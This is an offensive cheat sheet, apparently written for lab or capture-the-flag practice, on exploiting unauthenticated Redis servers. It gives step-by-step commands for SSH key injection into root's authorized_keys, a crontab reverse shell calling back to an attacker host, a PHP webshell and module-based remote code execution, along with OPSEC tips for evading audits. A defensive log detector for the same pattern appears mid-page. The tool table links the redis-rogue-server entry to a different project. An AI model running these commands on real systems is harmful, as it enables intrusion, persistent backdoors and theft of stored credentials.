Redis Exploitation
# Overview
Redis is an in-memory data store that, in its default configuration, listens on port 6379 without authentication. Unauthenticated Redis access allows attackers to read all stored data, write files to disk (including SSH keys, crontabs, and web shells), and in some cases load custom modules for direct remote code execution.
# Prerequisites
- redis-cli (or netcat/ncat for raw Redis protocol)
- redis-rogue-server or redis-rogue-getshell for module-based RCE
# Detection & Enumeration
```bash
nmap -p 6379 --script redis-info <IP>   # Redis version and info
redis-cli -h <IP> ping                  # Check if unauthenticated
redis-cli -h <IP> INFO                  # Full server info
redis-cli -h <IP> CONFIG GET '*'        # Dump Redis configuration
redis-cli -h <IP> KEYS '*'              # List all keys
redis-cli -h <IP> CLIENT LIST           # List connected clients
```
# Exploitation / Execution
# SSH Key Injection (Most Reliable)
Generate an SSH key pair on the attacker machine, then inject the public key into the target's authorized_keys:
```bash
ssh-keygen -t rsa -C "redis@backdoor" -f redis_key                    # Generate key pair
(echo -e "\n\n"; cat redis_key.pub; echo -e "\n\n") > key.txt         # Pad with newlines so the RDB header does not corrupt the key line
redis-cli -h <IP> CONFIG SET dir /root/.ssh                           # Set Redis working dir to .ssh
redis-cli -h <IP> CONFIG SET dbfilename authorized_keys               # Set output filename
cat key.txt | redis-cli -h <IP> -x SET crack                          # Load key as a Redis value
redis-cli -h <IP> SAVE                                                # Write the dump to disk
ssh -i redis_key root@<IP>                                            # SSH in
```
If the .ssh directory doesn't exist, try /home/<user>/.ssh or /var/lib/redis/.ssh.
# Crontab Injection
```bash
redis-cli -h <IP> CONFIG SET dir /var/spool/cron/crontabs   # For Debian/Ubuntu
redis-cli -h <IP> SET crack "\n\n*/1 * * * * /bin/bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'\n\n"
redis-cli -h <IP> CONFIG SET dbfilename root                # Write to root's crontab
redis-cli -h <IP> SAVE
```
Note: This overwrites existing crontab files and is destructive.
# Webshell via Redis
```bash
redis-cli -h <IP> CONFIG SET dir /var/www/html                        # Set dir to web root
redis-cli -h <IP> CONFIG SET dbfilename shell.php                     # Output file
redis-cli -h <IP> SET payload "<?php system(\$_GET['cmd']); ?>"       # PHP webshell
redis-cli -h <IP> SAVE
curl "http://<IP>/shell.php?cmd=id"
```
# Module Loading for RCE
For Redis 4.x+, upload a compiled Redis module:
```bash
git clone https://github.com/n0b0dayCN/RedisModules-ExecuteCommand
cd RedisModules-ExecuteCommand && make
redis-cli -h <IP> MODULE LOAD /path/to/module.so <cmd>   # Execute arbitrary command
```
Alternative: Use redis-rogue-server.py for automated module-based RCE.
# Common Pitfalls
- Warning: Config changes persist and may break the Redis instance -- reset the config before leaving: `CONFIG SET dir /var/lib/redis`
- Warning: The .ssh directory must exist on the target; if it doesn't, create it first (if you have other access) or try different paths
- Warning: Crontab injection clobbers the existing crontab; it is destructive
# OPSEC Considerations
- The Redis SAVE command creates a DB dump file that may trigger file integrity monitoring
- New SSH keys in authorized_keys are easily spotted during audits
- Unexpected Redis config changes leave evidence in Redis logs
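From the defender's side, the sequence above is easy to spot in Redis MONITOR output. The following Python detector is an added example, not part of this page: it flags CONFIG SET dir/dbfilename followed by SAVE or BGSAVE from the same client, a dir pointed at an SSH, cron or web root path, and any MODULE LOAD. The MONITOR line layout is the standard `<timestamp> [<db> <addr>] "cmd" "arg"` form; the sample lines and client addresses are constructed for the example.

```python
import re
from collections import defaultdict
# MONITOR line shape: <unix_ts> [<db> <client_addr>] "<cmd>" "<arg>" ...
LINE_RE = re.compile(r'^(?P<ts>[\d.]+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<rest>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Paths the dir/dbfilename trick targets; pointing "dir" here is an alert on its own.
SENSITIVE_DIRS = ("/.ssh", "/var/spool/cron", "/etc/cron", "/var/www")
# Constructed sample MONITOR output with hypothetical client addresses (not a real capture).
SAMPLE_MONITOR = """\
1700000000.100000 [0 10.0.0.5:51234] "PING"
1700000001.200000 [0 10.0.0.5:51234] "CONFIG" "SET" "dir" "/root/.ssh"
1700000002.300000 [0 10.0.0.5:51234] "CONFIG" "SET" "dbfilename" "authorized_keys"
1700000003.400000 [0 10.0.0.5:51234] "SET" "crack" "\\n\\nssh-rsa PLACEHOLDER\\n\\n"
1700000004.500000 [0 10.0.0.5:51234] "SAVE"
1700000005.600000 [0 10.0.0.5:51234] "MODULE" "LOAD" "/tmp/module.so"
1700000010.000000 [0 10.0.0.9:40000] "GET" "session:42"
1700000011.000000 [0 10.0.0.9:40000] "SAVE"
"""

def parse_line(line):
    """Split one MONITOR line into (client, timestamp, [cmd, arg, ...]); None if unparsable."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m.group("client"), float(m.group("ts")), ARG_RE.findall(m.group("rest"))

def detect_file_write_abuse(lines, window=300.0):
    """Return (client, rule, detail) alerts: CONFIG SET dir/dbfilename then SAVE/BGSAVE
    from the same client within `window` seconds, dir aimed at a sensitive path, MODULE LOAD."""
    pending = defaultdict(dict)  # client -> {"dir": (ts, value), "dbfilename": (ts, value)}
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if not parsed or not parsed[2]:
            continue
        client, ts, args = parsed
        cmd = args[0].upper()
        if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET" \
                and args[2].lower() in ("dir", "dbfilename"):
            pending[client][args[2].lower()] = (ts, args[3])
            if args[2].lower() == "dir" and any(s in args[3] for s in SENSITIVE_DIRS):
                alerts.append((client, "sensitive_dir", args[3]))
        elif cmd in ("SAVE", "BGSAVE"):
            recent = {k: v for k, (t, v) in pending[client].items() if ts - t <= window}
            if recent:  # config was changed shortly before the dump was forced
                alerts.append((client, "config_then_save", recent.get("dir", "?") + "/" + recent.get("dbfilename", "?")))
            pending[client].clear()
        elif cmd == "MODULE" and len(args) >= 3 and args[1].upper() == "LOAD":
            alerts.append((client, "module_load", args[2]))
    return alerts
```

Feed it `redis-cli MONITOR` output piped to a file; the ordinary application client in the sample (a GET followed by a SAVE with no config change) produces no alert.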
# Post-Exploitation Value
- Direct root access via SSH if Redis is running as root
- All stored Redis data (often contains session tokens, cached credentials, API keys)
- Persistent access through SSH key or crontab
# Cross-References
# Tool References
| Tool | Link |
|---|---|
| redis-cli | Built-in with redis-tools package |
| redis-rogue-server | https://github.com/n0b0dayCN/RedisModules-ExecuteCommand |
# Source Machines
- Broker (Hard, Linux) - Redis unauthenticated access